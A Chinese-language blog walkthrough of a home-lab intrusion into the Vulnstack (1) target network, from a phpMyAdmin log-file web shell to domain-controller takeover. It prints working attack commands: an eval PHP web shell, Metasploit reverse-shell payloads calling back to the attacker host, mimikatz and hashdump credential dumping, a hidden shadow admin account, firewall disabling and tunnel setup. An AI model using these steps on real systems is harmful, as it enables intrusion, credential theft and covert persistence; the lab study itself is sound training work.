vulnstack(一)靶机

打的第一个内网靶机

准备

下载靶机

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

修改vm网卡，把win2k3和win server2008的网卡设置为仅主机模式，且修改IP段为192.168.52.0/24

win7添加一个仅主机网卡。

此时我的kaliIP为192.168.80.129win7外网IP为192.168.80.128后面变成了192.168.90.131，内网网段为192.168.52.0/24。

win7getshell

访问后，默认页面为phpstudy的php探针，于是在下面用root/root进行数据库连接测试，成功连接。

用御剑扫描，存在phpmyadmin，访问后用root/root直接登录。查看general_log

发现可以修改，于是开启general_log，并修改其存储位置为C:/phpStudy/WWW/sha.php（刚刚php探针看到的路径）。执行语句select <?php eval($_POST[a]);?>即可getshell。(蚁剑连上之后可以发现很多其他的漏洞，比如源码泄露啥的，就不说了)

内网渗透

msf和cs哪个上线都行，我习惯于cs上线然后msf直接挂代理打

cs和msf联动

https://blog.csdn.net/weixin_42035825/article/details/105186616

msf上线

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.80.129
set lport 8848
run

msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.80.129 lport=8848 -f exe -o shell.exe

将生成的shell.exe上传到服务器上并运行即可。

（火绒这东西属实顶，我在kali生成了exe，移出来就被杀了）

cs上线

安装可以看我写的这篇文章：https://blog.csdn.net/weixin_44377940/article/details/106771776

这玩意我可以说是不太会用，有需要的话可以看这个https://wbglil.gitbook.io/cobalt-strike/cobalt-strikeji-ben-shi-yong/jian-ting-qi-listener#beacon-http-and-beacon-https

先设置监听器：

再生成exe文件：

将生成的exe文件上传到服务器上并运行即可。（记得关掉杀软）

cs上线后，选定服务器，右键选择interact，即可进入beacon。

我们设置心跳为0sleep 0（现实没这么舒服，默认60，即60s一次回显）然后即可执行命令了。

提权

msf提权，直接getsystem即可，cs提权在右键->access->elevate，选择监听器执行即可。

信息收集

getshell之后，用whoami查看权限，发现是管理员权限，于是用命令行收集一些信息

我搭的环境好像有点问题，不能用net user /domain命令，会显示RPC不可用

在cs上线之后，还可以用mimikatz sekurlsa::logonpasswords抓取密码

msf上线可以用run windows/gather/credentials/windows_autologin 抓取自动登录的用户名和密码或run hashdump 、run windows/gather/smart_hashdump获取哈希（后两条都是要system权限）

得到域为god.org，有三台主机，域控为192.168.52.138

小插曲

因为net user /domain有问题，就重装了一下win7，之后域上不去了，显示该工作站与与主域之间的信任关系失败，然后按照百度经验的方法退域之后加域，发现加不上了，提示找不到域路径，只好重装所有环境，win7的外网地址就变成了192.168.80.131

开启3389端口

管理员权限，且需要关闭防火墙net stop mpssvc

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#设置远程桌面端口
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

#开启远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

https://www.freebuf.com/articles/system/229209.html

win7靶机开不了，很迷

添加影子用户

net user zhangsan$ /add

将Administrator账户的 F值覆盖zhangsan$的F值

导出zhangsan$的账户信息和 SID信息。

删除创建的账户zhangsan$

net user zhangsan$ /del

导入导出的zhangsan$的账户信息到注册表。（之前跟着学长玩学校内网的时候看到过，不过现在大部分对这个好像都有检测手段）

发现内网机器

ICMP扫描

for /L %I in (1,1,254) DO @ping -2 1 -n 1 192.168.52.%I | findstr "TTL="

nmap扫描

nmap扫描有三种：端口转发、通过肉鸡上的工具扫描、攻击机代理进入内网扫描。因为这里直接就有nmap，所以直接用肉鸡的扫就行了，剩下的两种要经过代理。

用ew+proxychains搭建代理

earthworm，具体用法看这：http://rootkiter.com/EarthWorm/

将earthworm/server/download/ew.zip解压缩

在kali上运行：

./ew_linux_x64 -s rcsocks -l 1080 -e 1234

该命令的意思是在kali上添加一个转接隧道，把本地1080端口收到的代理请求转交给1234端口。

在web服务器上运行

./ew_linux_x64 -s rssocks -d 192.168.80.128 -e 1080

该命令的意思是在web服务器上启动SOCKS5服务，并反弹到IP地址为192.168.80.128（kali）的1234端口上。

/etc/proxychains.conf修改内容如下，去掉dynamic_chain的注释，并且在最后的位置添加代理127.0.0.1 1234。

域里有三台机子：

路由转发后通过msf模块扫描

通过msf的添加路由，使msf能通过192.168.80.131访问192.168.52.0/24

meterpreter >run get_local_subnets #获取网段路由

如这里我获取的是

Local subnet: 192.168.52.0/255.255.255.0

然后执行run autoroute -s 192.168.52.0/24即可添加路由，通过run autoroute -p进行路由查询

用background退到MSF攻击平台的操作面，为后面调用其他攻击模块做好准备。查询所有sessionsessions -i

常用的主机发现模块

auxiliary/scanner/discover/arp_sweep

常用的端口扫描模块：

auxiliary/scanner/portscan/ack ACK防火墙扫描
auxiliary/scanner/portscan/ftpbounce FTP跳端口扫描
auxiliary/scanner/portscan/syn SYN端口扫描
auxiliary/scanner/portscan/tcp TCP端口扫描
auxiliary/scanner/portscan/xmas TCP"XMas"端口扫描

横向移动

发现了机器之后进行漏洞扫描nmap --script=vuln 192.168.52.138或搭建nessus经过代理进入内网。

这次我们用nmap扫描一下，得到一个漏洞：

用msf的模块打了一下，直接把我VM打炸了，打算试试其他的，但看到mimikatz读取出来的密码是初始密码（顺带一提，mimikatz是读取lsass.exe进程中保存的令牌然后进行破解，win10好像已经不行了，要魔改），不是我修改后的密码，我就知道不可能用网上的SMB大法了（SMB Beacon使用命名管道通过父级Beacon进行通讯，当两个Beacons链接后，子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信，此流量封装在SMB协议中，所以SMB Beacon相对隐蔽，绕防火墙时可能发挥奇效。）。

把靶机放在服务器上之后好多了，kali地址变成了172.16.43.52，win7的IP变成了172.16.43.8。继续开工，不过msf和cs联动就不整了，直接挂代理吧

继续打，打了一趟，发现原来是蓝屏了，这tm就很尴尬了。试了一下，发现只有exploit/windows/smb/ms17_010_psexec和auxiliary/admin/smb/ms17_010_command能用。

用exploit/windows/smb/ms17_010_psexec的时候发现每次都是执行成功但没有创建session。想了下，发现了原因：因为138也就是域控服务器不能出网，只能到我们控制的这台win7服务器。

于是我们可以有这样的思路：利用内网穿透工具设置反向代理，将kali机的某个端口转发到win7的某个端口上。这里我用的是frp（练一下咋用嘛）。参考了这个师傅的思路。

拿下域控

将frps相关文件上传到win7上，并修改配置文件，然后启动：

[common]
bind_port = 7010

kali修改frpc配置文件，并启动：

[common]
server_addr = 172.16.43.8 #win7的IP
server_port = 7010

[ssh]
type = tcp
local_ip = 172.16.43.52#kali的IP
local_port = 8000
remote_port = 6000

此时，我访问win7的6000端口时，相当于访问kali的8000端口

再开一个不用代理的msf，配置如下：

再利用代理的msf进行攻击，配置如下：

然后可以在没代理的msf上得到session。

红日团队的打法：ATT&CK实战 | Vulnstack 红队（一） - FreeBuf网络安全行业门户

写的有点乱，中间隔了太久，见谅。

• 本文作者： Sn1pEr
• 本文链接： https://sn1per-ssd.github.io/2021/04/07/vulnstack(一)靶机/
• 版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！